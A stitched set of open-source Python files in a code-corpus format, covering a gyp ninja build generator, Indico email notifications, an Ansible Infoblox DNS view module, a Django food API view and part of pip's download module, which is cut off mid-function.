cxx_command = ('ninja -t msvc -e $arch ' +
'-- '
'$cxx /nologo /showIncludes /FC '
'@$out.rsp /c $in /Fo$out /Fd$pdbname_cc ')
master_ninja.rule(
'cc',
description='CC $out',
command=cc_command,
rspfile='$out.rsp',
rspfile_content='$defines $includes $cflags $cflags_c',
deps=deps)
master_ninja.rule(
'cxx',
description='CXX $out',
command=cxx_command,
rspfile='$out.rsp',
rspfile_content='$defines $includes $cflags $cflags_cc',
deps=deps)
master_ninja.rule(
'idl',
description='IDL $in',
command=('%s gyp-win-tool midl-wrapper $arch $outdir '
'$tlb $h $dlldata $iid $proxy $in '
'$midl_includes $idlflags' % sys.executable))
master_ninja.rule(
'rc',
description='RC $in',
# Note: $in must be last otherwise rc.exe complains.
command=('%s gyp-win-tool rc-wrapper '
'$arch $rc $defines $resource_includes $rcflags /fo$out $in' %
sys.executable))
master_ninja.rule(
'asm',
description='ASM $out',
command=('%s gyp-win-tool asm-wrapper '
'$arch $asm $defines $includes $asmflags /c /Fo $out $in' %
sys.executable))
if flavor != 'mac' and flavor != 'win':
master_ninja.rule(
'alink',
description='AR $out',
command='rm -f $out && $ar rcs $arflags $out $in')
master_ninja.rule(
'alink_thin',
description='AR $out',
command='rm -f $out && $ar rcsT $arflags $out $in')
# This allows targets that only need to depend on $lib's API to declare an
# order-only dependency on $lib.TOC and avoid relinking such downstream
# dependencies when $lib changes only in non-public ways.
# The resulting string leaves an uninterpolated %{suffix} which
# is used in the final substitution below.
mtime_preserving_solink_base = (
'if [ ! -e $lib -o ! -e $lib.TOC ]; then '
'%(solink)s && %(extract_toc)s > $lib.TOC; else '
'%(solink)s && %(extract_toc)s > $lib.tmp && '
'if ! cmp -s $lib.tmp $lib.TOC; then mv $lib.tmp $lib.TOC ; '
'fi; fi'
% { 'solink':
'$ld -shared $ldflags -o $lib -Wl,-soname=$soname %(suffix)s',
'extract_toc':
('{ $readelf -d $lib | grep SONAME ; '
'$nm -gD -f p $lib | cut -f1-2 -d\' \'; }')})
master_ninja.rule(
'solink',
description='SOLINK $lib',
restat=True,
command=mtime_preserving_solink_base % {'suffix': '@$link_file_list'},
rspfile='$link_file_list',
rspfile_content=
'-Wl,--whole-archive $in $solibs -Wl,--no-whole-archive $libs',
pool='link_pool')
master_ninja.rule(
'solink_module',
description='SOLINK(module) $lib',
restat=True,
command=mtime_preserving_solink_base % {'suffix': '@$link_file_list'},
rspfile='$link_file_list',
rspfile_content='-Wl,--start-group $in -Wl,--end-group $solibs $libs',
pool='link_pool')
master_ninja.rule(
'link',
description='LINK $out',
command=('$ld $ldflags -o $out '
'-Wl,--start-group $in -Wl,--end-group $solibs $libs'),
pool='link_pool')
elif flavor == 'win':
master_ninja.rule(
'alink',
description='LIB $out',
command=('%s gyp-win-tool link-wrapper $arch False '
'$ar /nologo /ignore:4221 /OUT:$out @$out.rsp' %
sys.executable),
rspfile='$out.rsp',
rspfile_content='$in_newline $libflags')
_AddWinLinkRules(master_ninja, embed_manifest=True)
_AddWinLinkRules(master_ninja, embed_manifest=False)
else:
master_ninja.rule(
'objc',
description='OBJC $out',
command=('$cc -MMD -MF $out.d $defines $includes $cflags $cflags_objc '
'$cflags_pch_objc -c $in -o $out'),
depfile='$out.d',
deps=deps)
master_ninja.rule(
'objcxx',
description='OBJCXX $out',
command=('$cxx -MMD -MF $out.d $defines $includes $cflags $cflags_objcc '
'$cflags_pch_objcc -c $in -o $out'),
depfile='$out.d',
deps=deps)
master_ninja.rule(
'alink',
description='LIBTOOL-STATIC $out, POSTBUILDS',
command='rm -f $out && '
'./gyp-mac-tool filter-libtool libtool $libtool_flags '
'-static -o $out $in'
'$postbuilds')
master_ninja.rule(
'lipo',
description='LIPO $out, POSTBUILDS',
command='rm -f $out && lipo -create $in -output $out$postbuilds')
master_ninja.rule(
'solipo',
description='SOLIPO $out, POSTBUILDS',
command=(
'rm -f $lib $lib.TOC && lipo -create $in -output $lib$postbuilds &&'
'%(extract_toc)s > $lib.TOC'
% { 'extract_toc':
'{ otool -l $lib | grep LC_ID_DYLIB -A 5; '
'nm -gP $lib | cut -f1-2 -d\' \' | grep -v U$$; true; }'}))
# Record the public interface of $lib in $lib.TOC. See the corresponding
# comment in the posix section above for details.
solink_base = '$ld %(type)s $ldflags -o $lib %(suffix)s'
mtime_preserving_solink_base = (
'if [ ! -e $lib -o ! -e $lib.TOC ] || '
# Always force dependent targets to relink if this library
# reexports something. Handling this correctly would require
# recursive TOC dumping but this is rare in practice, so punt.
'otool -l $lib | grep -q LC_REEXPORT_DYLIB ; then '
'%(solink)s && %(extract_toc)s > $lib.TOC; '
'else '
'%(solink)s && %(extract_toc)s > $lib.tmp && '
'if ! cmp -s $lib.tmp $lib.TOC; then '
'mv $lib.tmp $lib.TOC ; '
'fi; '
'fi'
% { 'solink': solink_base,
'extract_toc':
'{ otool -l $lib | grep LC_ID_DYLIB -A 5; '
'nm -gP $lib | cut -f1-2 -d\' \' | grep -v U$$; true; }'})
solink_suffix = '@$link_file_list$postbuilds'
master_ninja.rule(
'solink',
description='SOLINK $lib, POSTBUILDS',
restat=True,
command=mtime_preserving_solink_base % {'suffix': solink_suffix,
'type': '-shared'},
rspfile='$link_file_list',
rspfile_content='$in $solibs $libs',
pool='link_pool')
master_ninja.rule(
'solink_notoc',
description='SOLINK $lib, POSTBUILDS',
restat=True,
command=solink_base % {'suffix':solink_suffix, 'type': '-shared'},
rspfile='$link_file_list',
rspfile_content='$in $solibs $libs',
pool='link_pool')
master_ninja.rule(
'solink_module',
description='SOLINK(module) $lib, POSTBUILDS',
restat=True,
command=mtime_preserving_solink_base % {'suffix': solink_suffix,
'type': '-bundle'},
rspfile='$link_file_list',
rspfile_content='$in $solibs $libs',
pool='link_pool')
master_ninja.rule(
'solink_module_notoc',
description='SOLINK(module) $lib, POSTBUILDS',
restat=True,
command=solink_base % {'suffix': solink_suffix, 'type': '-bundle'},
rspfile='$link_file_list',
rspfile_content='$in $solibs $libs',
pool='link_pool')
master_ninja.rule(
'link',
description='LINK $out, POSTBUILDS',
command=('$ld $ldflags -o $out '
'$in $solibs $libs$postbuilds'),
pool='link_pool')
master_ninja.rule(
'preprocess_infoplist',
description='PREPROCESS INFOPLIST $out',
command=('$cc -E -P -Wno-trigraphs -x c $defines $in -o $out && '
'plutil -convert xml1 $out $out'))
master_ninja.rule(
'copy_infoplist',
description='COPY INFOPLIST $in',
command='$env ./gyp-mac-tool copy-info-plist $in $out $binary $keys')
master_ninja.rule(
'merge_infoplist',
description='MERGE INFOPLISTS $in',
command='$env ./gyp-mac-tool merge-info-plist $out $in')
master_ninja.rule(
'compile_xcassets',
description='COMPILE XCASSETS $in',
command='$env ./gyp-mac-tool compile-xcassets $keys $in')
master_ninja.rule(
'mac_tool',
description='MACTOOL $mactool_cmd $in',
command='$env ./gyp-mac-tool $mactool_cmd $in $out $binary')
master_ninja.rule(
'package_framework',
description='PACKAGE FRAMEWORK $out, POSTBUILDS',
command='./gyp-mac-tool package-framework $out $version$postbuilds '
'&& touch $out')
if flavor == 'win':
master_ninja.rule(
'stamp',
description='STAMP $out',
command='%s gyp-win-tool stamp $out' % sys.executable)
master_ninja.rule(
'copy',
description='COPY $in $out',
command='%s gyp-win-tool recursive-mirror $in $out' % sys.executable)
else:
master_ninja.rule(
'stamp',
description='STAMP $out',
command='${postbuilds}touch $out')
master_ninja.rule(
'copy',
description='COPY $in $out',
command='rm -rf $out && cp -af $in $out')
master_ninja.newline()
all_targets = set()
for build_file in params['build_files']:
for target in gyp.common.AllTargets(target_list,
target_dicts,
os.path.normpath(build_file)):
all_targets.add(target)
all_outputs = set()
# target_outputs is a map from qualified target name to a Target object.
target_outputs = {}
# target_short_names is a map from target short name to a list of Target
# objects.
target_short_names = {}
# short name of targets that were skipped because they didn't contain anything
# interesting.
# NOTE: there may be overlap between this an non_empty_target_names.
empty_target_names = set()
# Set of non-empty short target names.
# NOTE: there may be overlap between this an empty_target_names.
non_empty_target_names = set()
for qualified_target in target_list:
# qualified_target is like: third_party/icu/icu.gyp:icui18n#target
build_file, name, toolset = \
gyp.common.ParseQualifiedTarget(qualified_target)
this_make_global_settings = data[build_file].get('make_global_settings', [])
assert make_global_settings == this_make_global_settings, (
"make_global_settings needs to be the same for all targets. %s vs. %s" %
(this_make_global_settings, make_global_settings))
spec = target_dicts[qualified_target]
if flavor == 'mac':
gyp.xcode_emulation.MergeGlobalXcodeSettingsToSpec(data[build_file], spec)
# If build_file is a symlink, we must not follow it because there's a chance
# it could point to a path above toplevel_dir, and we cannot correctly deal
# with that case at the moment.
build_file = gyp.common.RelativePath(build_file, options.toplevel_dir,
False)
qualified_target_for_hash = gyp.common.QualifiedTarget(build_file, name,
toolset)
hash_for_rules = hashlib.md5(qualified_target_for_hash).hexdigest()
base_path = os.path.dirname(build_file)
obj = 'obj'
if toolset != 'target':
obj += '.' + toolset
output_file = os.path.join(obj, base_path, name + '.ninja')
ninja_output = StringIO()
writer = NinjaWriter(hash_for_rules, target_outputs, base_path, build_dir,
ninja_output,
toplevel_build, output_file,
flavor, toplevel_dir=options.toplevel_dir)
target = writer.WriteSpec(spec, config_name, generator_flags)
if ninja_output.tell() > 0:
# Only create files for ninja files that actually have contents.
with OpenOutput(os.path.join(toplevel_build, output_file)) as ninja_file:
ninja_file.write(ninja_output.getvalue())
ninja_output.close()
master_ninja.subninja(output_file)
if target:
if name != target.FinalOutput() and spec['toolset'] == 'target':
target_short_names.setdefault(name, []).append(target)
target_outputs[qualified_target] = target
if qualified_target in all_targets:
all_outputs.add(target.FinalOutput())
non_empty_target_names.add(name)
else:
empty_target_names.add(name)
if target_short_names:
# Write a short name to build this target. This benefits both the
# "build chrome" case as well as the gyp tests, which expect to be
# able to run actions and build libraries by their short name.
master_ninja.newline()
master_ninja.comment('Short names for targets.')
for short_name in target_short_names:
master_ninja.build(short_name, 'phony', [x.FinalOutput() for x in
target_short_names[short_name]])
# Write phony targets for any empty targets that weren't written yet. As
# short names are not necessarily unique only do this for short names that
# haven't already been output for another target.
empty_target_names = empty_target_names - non_empty_target_names
if empty_target_names:
master_ninja.newline()
master_ninja.comment('Empty targets (output for completeness).')
for name in sorted(empty_target_names):
master_ninja.build(name, 'phony')
if all_outputs:
master_ninja.newline()
master_ninja.build('all', 'phony', list(all_outputs))
master_ninja.default(generator_flags.get('default_target', 'all'))
master_ninja_file.close()
def PerformBuild(data, configurations, params):
options = params['options']
for config in configurations:
builddir = os.path.join(options.toplevel_dir, 'out', config)
arguments = ['ninja', '-C', builddir]
print 'Building [%s]: %s' % (config, arguments)
subprocess.check_call(arguments)
def CallGenerateOutputForConfig(arglist):
# Ignore the interrupt signal so that the parent process catches it and
# kills all multiprocessing children.
signal.signal(signal.SIGINT, signal.SIG_IGN)
(target_list, target_dicts, data, params, config_name) = arglist
GenerateOutputForConfig(target_list, target_dicts, data, params, config_name)
def GenerateOutput(target_list, target_dicts, data, params):
# Update target_dicts for iOS device builds.
target_dicts = gyp.xcode_emulation.CloneConfigurationForDeviceAndEmulator(
target_dicts)
user_config = params.get('generator_flags', {}).get('config', None)
if gyp.common.GetFlavor(params) == 'win':
target_list, target_dicts = MSVSUtil.ShardTargets(target_list, target_dicts)
target_list, target_dicts = MSVSUtil.InsertLargePdbShims(
target_list, target_dicts, generator_default_variables)
if user_config:
GenerateOutputForConfig(target_list, target_dicts, data, params,
user_config)
else:
config_names = target_dicts[target_list[0]]['configurations'].keys()
if params['parallel']:
try:
pool = multiprocessing.Pool(len(config_names))
arglists = []
for config_name in config_names:
arglists.append(
(target_list, target_dicts, data, params, config_name))
pool.map(CallGenerateOutputForConfig, arglists)
except KeyboardInterrupt, e:
pool.terminate()
raise e
else:
for config_name in config_names:
GenerateOutputForConfig(target_list, target_dicts, data, params,
config_name)
| mit |
jacquesd/indico | indico/modules/vc/notifications.py | 2 | 2446 | # This file is part of Indico.
# Copyright (C) 2002 - 2015 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from indico.core.notifications import make_email, send_email
from indico.web.flask.templating import get_template_module, get_overridable_template_name
from indico.modules.vc.util import get_linked_to_description
def notify_created(plugin, room, room_assoc, event, user):
"""Notifies about the creation of a vc_room.
:param room: the vc_room
:param event: the event
:param user: the user performing the action
"""
name = get_overridable_template_name('emails/created.html', plugin, core_prefix='vc/')
tpl = get_template_module(name, plugin=plugin, vc_room=room, event=event, vc_room_event=room_assoc, user=user,
linked_to_title=get_linked_to_description(room_assoc))
_send('create', user, plugin, event, room, tpl)
def notify_deleted(plugin, room, room_assoc, event, user):
"""Notifies about the deletion of a vc_room from the system.
:param room: the vc_room
:param event: the event
:param user: the user performing the action
"""
name = get_overridable_template_name('emails/deleted.html', plugin, core_prefix='vc/')
tpl = get_template_module(name, plugin=plugin, vc_room=room, event=event, vc_room_event=room_assoc, user=user)
_send('delete', user, plugin, event, room, tpl)
def _send(action, user, plugin, event, room, template_module):
to_list = {user.email}
cc_list = plugin.get_notification_cc_list(action, room, event) - to_list
bcc_list = plugin.get_notification_bcc_list(action, room, event) - cc_list - to_list
email = make_email(to_list, cc_list, bcc_list, template=template_module, html=True)
send_email(email, event, plugin.friendly_name)
| gpl-3.0 |
mavit/ansible | lib/ansible/modules/net_tools/nios/nios_dns_view.py | 12 | 4187 | #!/usr/bin/python
# Copyright (c) 2018 Red Hat, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: nios_dns_view
version_added: "2.5"
author: "Peter Sprygada (@privateip)"
short_description: Configure Infoblox NIOS DNS views
description:
- Adds and/or removes instances of DNS view objects from
Infoblox NIOS servers. This module manages NIOS C(view) objects
using the Infoblox WAPI interface over REST.
- Updates instances of DNS view object from Infoblox NIOS servers.
requirements:
- infoblox-client
extends_documentation_fragment: nios
options:
name:
description:
- Specifies the fully qualified hostname to add or remove from
the system. User can also update the hostname as it is possible
to pass a dict containing I(new_name), I(old_name). See examples.
required: true
aliases:
- view
network_view:
description:
- Specifies the name of the network view to assign the configured
DNS view to. The network view must already be configured on the
target system.
required: true
default: default
extattrs:
description:
- Allows for the configuration of Extensible Attributes on the
instance of the object. This argument accepts a set of key / value
pairs for configuration.
required: false
comment:
description:
- Configures a text string comment to be associated with the instance
of this object. The provided text string will be configured on the
object instance.
required: false
state:
description:
- Configures the intended state of the instance of the object on
the NIOS server. When this value is set to C(present), the object
is configured on the device and when this value is set to C(absent)
the value is removed (if necessary) from the device.
required: false
default: present
choices:
- present
- absent
'''
EXAMPLES = '''
- name: configure a new dns view instance
nios_dns_view:
name: ansible-dns
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: update the comment for dns view
nios_dns_view:
name: ansible-dns
comment: this is an example comment
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: remove the dns view instance
nios_dns_view:
name: ansible-dns
state: absent
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: update the dns view instance
nios_dns_view:
name: {new_name: ansible-dns-new, old_name: ansible-dns}
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.net_tools.nios.api import WapiModule
from ansible.module_utils.net_tools.nios.api import NIOS_DNS_VIEW
def main():
''' Main entry point for module execution
'''
ib_spec = dict(
name=dict(required=True, aliases=['view'], ib_req=True),
network_view=dict(default='default', ib_req=True),
extattrs=dict(type='dict'),
comment=dict()
)
argument_spec = dict(
provider=dict(required=True),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(ib_spec)
argument_spec.update(WapiModule.provider_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
wapi = WapiModule(module)
result = wapi.run(NIOS_DNS_VIEW, ib_spec)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
czgu/opendataexperience | server/api/views/query.py | 1 | 1608 | from django.forms.models import model_to_dict
from django.http import JsonResponse
from django.http import Http404
from api.models import DetailedFoodNutritions
from api.models import FoodCategory
from api.models import FoodCategorySpec
def food_handler(request):
if request.method != 'GET':
return JsonResponse({})
food_name = str(request.GET.get('name'))
if not food_name:
raise Http404('name not provided')
try:
food = DetailedFoodNutritions.objects.get(food_name=str(food_name))
except DetailedFoodNutritions.DoesNotExist:
raise Http404('food %s not found' % food_name, food_name)
return JsonResponse(food.toDict())
def category_all_handler(request):
if request.method != 'GET':
return JsonResponse({})
categories = FoodCategory.objects.all()
return JsonResponse(
{'categories': map(lambda e: model_to_dict(e), categories)})
def category_all_detailed_handler(request):
if request.method != 'GET':
return JsonResponse({})
categories = FoodCategory.objects.all()
formated_categories = []
for category in categories:
sub_categories = category.foodcategoryspec_set.all()
formated_dict = model_to_dict(category)
formated_dict['sub_categories'] = []
for sub_category in sub_categories:
_sub_dict = model_to_dict(sub_category)
del _sub_dict['general_category']
formated_dict['sub_categories'].append(_sub_dict)
formated_categories.append(formated_dict)
return JsonResponse({'categories': formated_categories})
| apache-2.0 |
camilonos77/bootstrap-form-python-generator | enviroment/lib/python2.7/site-packages/pip/download.py | 328 | 22580 | import cgi
import email.utils
import hashlib
import getpass
import mimetypes
import os
import platform
import re
import shutil
import sys
import tempfile
import pip
from pip.backwardcompat import urllib, urlparse, raw_input
from pip.exceptions import InstallationError, HashMismatch
from pip.util import (splitext, rmtree, format_size, display_path,
backup_dir, ask_path_exists, unpack_file,
create_download_cache_folder, cache_download)
from pip.vcs import vcs
from pip.log import logger
from pip._vendor import requests, six
from pip._vendor.requests.adapters import BaseAdapter
from pip._vendor.requests.auth import AuthBase, HTTPBasicAuth
from pip._vendor.requests.compat import IncompleteRead
from pip._vendor.requests.exceptions import InvalidURL, ChunkedEncodingError
from pip._vendor.requests.models import Response
from pip._vendor.requests.structures import CaseInsensitiveDict
__all__ = ['get_file_content',
'is_url', 'url_to_path', 'path_to_url',
'is_archive_file', 'unpack_vcs_link',
'unpack_file_url', 'is_vcs_url', 'is_file_url', 'unpack_http_url']
def user_agent():
"""Return a string representing the user agent."""
_implementation = platform.python_implementation()
if _implementation == 'CPython':
_implementation_version = platform.python_version()
elif _implementation == 'PyPy':
_implementation_version = '%s.%s.%s' % (sys.pypy_version_info.major,
sys.pypy_version_info.minor,
sys.pypy_version_info.micro)
if sys.pypy_version_info.releaselevel != 'final':
_implementation_version = ''.join([
_implementation_version,
sys.pypy_version_info.releaselevel,
])
elif _implementation == 'Jython':
_implementation_version = platform.python_version() # Complete Guess
elif _implementation == 'IronPython':
_implementation_version = platform.python_version() # Complete Guess
else:
_implementation_version = 'Unknown'
try:
p_system = platform.system()
p_release = platform.release()
except IOError:
p_system = 'Unknown'
p_release = 'Unknown'
return " ".join(['pip/%s' % pip.__version__,
'%s/%s' % (_implementation, _implementation_version),
'%s/%s' % (p_system, p_release)])
class MultiDomainBasicAuth(AuthBase):
def __init__(self, prompting=True):
self.prompting = prompting
self.passwords = {}
def __call__(self, req):
parsed = urlparse.urlparse(req.url)
# Get the netloc without any embedded credentials
netloc = parsed.netloc.split("@", 1)[-1]
# Set the url of the request to the url without any credentials
req.url = urlparse.urlunparse(parsed[:1] + (netloc,) + parsed[2:])
# Use any stored credentials that we have for this netloc
username, password = self.passwords.get(netloc, (None, None))
# Extract credentials embedded in the url if we have none stored
if username is None:
username, password = self.parse_credentials(parsed.netloc)
if username or password:
# Store the username and password
self.passwords[netloc] = (username, password)
# Send the basic auth with this request
req = HTTPBasicAuth(username or "", password or "")(req)
# Attach a hook to handle 401 responses
req.register_hook("response", self.handle_401)
return req
def handle_401(self, resp, **kwargs):
# We only care about 401 responses, anything else we want to just
# pass through the actual response
if resp.status_code != 401:
return resp
# We are not able to prompt the user so simple return the response
if not self.prompting:
return resp
parsed = urlparse.urlparse(resp.url)
# Prompt the user for a new username and password
username = raw_input("User for %s: " % parsed.netloc)
password = getpass.getpass("Password: ")
# Store the new username and password to use for future requests
if username or password:
self.passwords[parsed.netloc] = (username, password)
# Consume content and release the original connection to allow our new
# request to reuse the same one.
resp.content
resp.raw.release_conn()
# Add our new username and password to the request
req = HTTPBasicAuth(username or "", password or "")(resp.request)
# Send our new request
new_resp = resp.connection.send(req, **kwargs)
new_resp.history.append(resp)
return new_resp
def parse_credentials(self, netloc):
if "@" in netloc:
userinfo = netloc.rsplit("@", 1)[0]
if ":" in userinfo:
return userinfo.split(":", 1)
return userinfo, None
return None, None
class LocalFSResponse(object):
def __init__(self, fileobj):
self.fileobj = fileobj
def __getattr__(self, name):
return getattr(self.fileobj, name)
def read(self, amt=None, decode_content=None, cache_content=False):
return self.fileobj.read(amt)
# Insert Hacks to Make Cookie Jar work w/ Requests
@property
def _original_response(self):
class FakeMessage(object):
def getheaders(self, header):
return []
def get_all(self, header, default):
return []
class FakeResponse(object):
@property
def msg(self):
return FakeMessage()
return FakeResponse()
class LocalFSAdapter(BaseAdapter):
def send(self, request, stream=None, timeout=None, verify=None, cert=None,
proxies=None):
parsed_url = urlparse.urlparse(request.url)
# We only work for requests with a host of localhost
if parsed_url.netloc.lower() != "localhost":
raise InvalidURL("Invalid URL %r: Only localhost is allowed" %
request.url)
real_url = urlparse.urlunparse(parsed_url[:1] + ("",) + parsed_url[2:])
pathname = url_to_path(real_url)
resp = Response()
resp.status_code = 200
resp.url = real_url
stats = os.stat(pathname)
modified = email.utils.formatdate(stats.st_mtime, usegmt=True)
resp.headers = CaseInsensitiveDict({
"Content-Type": mimetypes.guess_type(pathname)[0] or "text/plain",
"Content-Length": stats.st_size,
"Last-Modified": modified,
})
resp.raw = LocalFSResponse(open(pathname, "rb"))
resp.close = resp.raw.close
return resp
def close(self):
pass
class PipSession(requests.Session):
timeout = None
def __init__(self, *args, **kwargs):
super(PipSession, self).__init__(*args, **kwargs)
# Attach our User Agent to the request
self.headers["User-Agent"] = user_agent()
# Attach our Authentication handler to the session
self.auth = MultiDomainBasicAuth()
# Enable file:// urls
self.mount("file://", LocalFSAdapter())
def request(self, method, url, *args, **kwargs):
# Make file:// urls not fail due to lack of a hostname
parsed = urlparse.urlparse(url)
if parsed.scheme == "file":
url = urlparse.urlunparse(parsed[:1] + ("localhost",) + parsed[2:])
# Allow setting a default timeout on a session
kwargs.setdefault("timeout", self.timeout)
# Dispatch the actual request
return super(PipSession, self).request(method, url, *args, **kwargs)
def get_file_content(url, comes_from=None, session=None):
"""Gets the content of a file; it may be a filename, file: URL, or
http: URL. Returns (location, content). Content is unicode."""
if session is None:
session = PipSession()
match = _scheme_re.search(url)
if match:
scheme = match.group(1).lower()
if (scheme == 'file' and comes_from
and comes_from.startswith('http')):
raise InstallationError(
'Requirements file %s references URL %s, which is local'
% (comes_from, url))
if scheme == 'file':
path = url.split(':', 1)[1]
path = path.replace('\\', '/')
match = _url_slash_drive_re.match(path)
if match:
path = match.group(1) + ':' + path.split('|', 1)[1]
path = urllib.unquote(path)
if path.startswith('/'):
path = '/' + path.lstrip('/')
url = path
else:
## FIXME: catch some errors
resp = session.get(url)
resp.raise_for_status()
if six.PY3:
return resp.url, resp.text
else:
return resp.url, resp.content
try:
f = open(url)
content = f.read()
except IOError:
e = sys.exc_info()[1]
raise InstallationError('Could not open requirements file: %s' % str(e))
else:
f.close()
return url, content
_scheme_re = re.compile(r'^(http|https|file):', re.I)
_url_slash_drive_re = re.compile(r'/*([a-z])\|', re.I)
def is_url(name):
"""Returns true if the name looks like a URL"""
if ':' not in name:
return False
scheme = name.split(':', 1)[0].lower()
return scheme in ['http', 'https', 'file', 'ftp'] + vcs.all_schemes
def url_to_path(url):
"""
Convert a file: URL to a path.
"""
assert url.startswith('file:'), (
"You can only turn file: urls into filenames (not %r)" % url)
path = url[len('file:'):].lstrip('/')
path = urllib.unquote(path)
if _url_drive_re.match(path):
path = path[0] + ':' + path[2:]
else:
path = '/' + path
return path
_drive_re = re.compile('^([a-z]):', re.I)
_url_drive_re = re.compile('^([a-z])[:|]', re.I)
def path_to_url(path):
"""
Convert a path to a file: URL. The path will be made absolute and have
quoted path parts.
"""
path = os.path.normpath(os.path.abspath(path))
drive, path = os.path.splitdrive(path)
filepath = path.split(os.path.sep)
url = '/'.join([urllib.quote(part) for part in filepath])
if not drive:
url = url.lstrip('/')
return 'file:///' + drive + url
def is_archive_file(name):
"""Return True if `name` is a considered as an archive file."""
archives = ('.zip', '.tar.gz', '.tar.bz2', '.tgz', '.tar', '.pybundle',
'.whl')
ext = splitext(name)[1].lower()
if ext in archives:
return True
return False
def unpack_vcs_link(link, location, only_download=False):
vcs_backend = _get_used_vcs_backend(link)
if only_download:
vcs_backend.export(location)
else:
vcs_backend.unpack(location)
def _get_used_vcs_backend(link):
for backend in vcs.backends:
if link.scheme in backend.schemes:
vcs_backend = backend(link.url)
return vcs_backend
def is_vcs_url(link):
return bool(_get_used_vcs_backend(link))
def is_file_url(link):
return link.url.lower().startswith('file:')
def _check_hash(download_hash, link):
if download_hash.digest_size != hashlib.new(link.hash_name).digest_size:
logger.fatal("Hash digest size of the package %d (%s) doesn't match the expected hash name %s!"
% (download_hash.digest_size, link, link.hash_name))
raise HashMismatch('Hash name mismatch for package %s' % link)
if download_hash.hexdigest() != link.hash:
logger.fatal("Hash of the package %s (%s) doesn't match the expected hash %s!"
% (link, download_hash.hexdigest(), link.hash))
raise HashMismatch('Bad %s hash for package %s' % (link.hash_name, link))
def _get_hash_from_file(target_file, link):
try:
download_hash = hashlib.new(link.hash_name)
except (ValueError, TypeError):
logger.warn("Unsupported hash name %s for package %s" % (link.hash_name, link))
return None
fp = open(target_file, 'rb')
while True:
chunk = fp.read(4096)
if not chunk:
break
download_hash.update(chunk)
fp.close()
return download_hash
def _download_url(resp, link, temp_location):
fp = open(temp_location, 'wb')
download_hash = None
if link.hash and link.hash_name:
try:
download_hash = hashlib.new(link.hash_name)
except ValueError:
logger.warn("Unsupported hash name %s for package %s" % (link.hash_name, link))
try:
total_length = int(resp.headers['content-length'])
except (ValueError, KeyError, TypeError):
total_length = 0
downloaded = 0
show_progress = total_length > 40 * 1000 or not total_length
show_url = link.show_url
try:
if show_progress:
## FIXME: the URL can get really long in this message:
if total_length:
logger.start_progress('Downloading %s (%s): ' % (show_url, format_size(total_length)))
else:
logger.start_progress('Downloading %s (unknown size): ' % show_url)
else:
logger.notify('Downloading %s' % show_url)
logger.info('Downloading from URL %s' % link)
def resp_read(chunk_size):
try:
# Special case for urllib3.
try:
for chunk in resp.raw.stream(
chunk_size, decode_content=False):
yield chunk
except IncompleteRead as e:
raise ChunkedEncodingError(e)
except AttributeError:
# Standard file-like object.
while True:
chunk = resp.raw.read(chunk_size)
if not chunk:
break
yield chunk
for chunk in resp_read(4096):
downloaded += len(chunk)
if show_progress:
if not total_length:
logger.show_progress('%s' % format_size(downloaded))
else:
logger.show_progress('%3i%% %s' % (100 * downloaded / total_length, format_size(downloaded)))
if download_hash is not None:
download_hash.update(chunk)
fp.write(chunk)
fp.close()
finally:
if show_progress:
logger.end_progress('%s downloaded' % format_size(downloaded))
return download_hash
def _copy_file(filename, location, content_type, link):
copy = True
download_location = os.path.join(location, link.filename)
if os.path.exists(download_location):
response = ask_path_exists(
'The file %s exists. (i)gnore, (w)ipe, (b)ackup ' %
display_path(download_location), ('i', 'w', 'b'))
if response == 'i':
copy = False
elif response == 'w':
logger.warn('Deleting %s' % display_path(download_location))
os.remove(download_location)
elif response == 'b':
dest_file = backup_dir(download_location)
logger.warn('Backing up %s to %s'
% (display_path(download_location), display_path(dest_file)))
shutil.move(download_location, dest_file)
if copy:
shutil.copy(filename, download_location)
logger.notify('Saved %s' % display_path(download_location))
def unpack_http_url(link, location, download_cache, download_dir=None,
session=None):
if session is None:
session = PipSession()
temp_dir = tempfile.mkdtemp('-unpack', 'pip-')
temp_location = None
target_url = link.url.split('#', 1)[0]
already_cached = False
cache_file = None
cache_content_type_file = None
download_hash = None
# If a download cache is specified, is the file cached there?
if download_cache:
cache_file = os.path.join(download_cache,
urllib.quote(target_url, ''))
cache_content_type_file = cache_file + '.content-type'
already_cached = (
os.path.exists(cache_file) and
os.path.exists(cache_content_type_file)
)
if not os.path.isdir(download_cache):
create_download_cache_folder(download_cache)
# If a download dir is specified, is the file already downloaded there?
already_downloaded = None
if download_dir:
already_downloaded = os.path.join(download_dir, link.filename)
if not os.path.exists(already_downloaded):
already_downloaded = None
# If already downloaded, does it's hash match?
if already_downloaded:
temp_location = already_downloaded
content_type = mimetypes.guess_type(already_downloaded)[0]
logger.notify('File was already downloaded %s' % already_downloaded)
if link.hash:
download_hash = _get_hash_from_file(temp_location, link)
try:
_check_hash(download_hash, link)
except HashMismatch:
logger.warn(
'Previously-downloaded file %s has bad hash, '
're-downloading.' % temp_location
)
temp_location = None
os.unlink(already_downloaded)
already_downloaded = None
# If not a valid download, let's confirm the cached file is valid
if already_cached and not temp_location:
with open(cache_content_type_file) as fp:
content_type = fp.read().strip()
temp_location = cache_file
logger.notify('Using download cache from %s' % cache_file)
if link.hash and link.hash_name:
download_hash = _get_hash_from_file(cache_file, link)
try:
_check_hash(download_hash, link)
